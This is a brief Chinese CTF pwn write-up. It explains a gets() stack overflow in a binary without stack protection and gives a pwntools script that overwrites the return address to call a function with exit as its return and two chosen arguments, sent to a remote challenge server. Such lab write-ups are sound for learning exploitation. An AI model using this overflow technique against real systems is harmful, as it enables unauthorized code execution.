checksec
没有栈保护,应该还是栈溢出
一般是先在main函数查找,看看整体逻辑
找到了get漏洞
注意啊注意!
这里这道题没有缓冲区
这是正常的题,这里有个s
但是这道题!
只有R没有s
这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题
python
from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()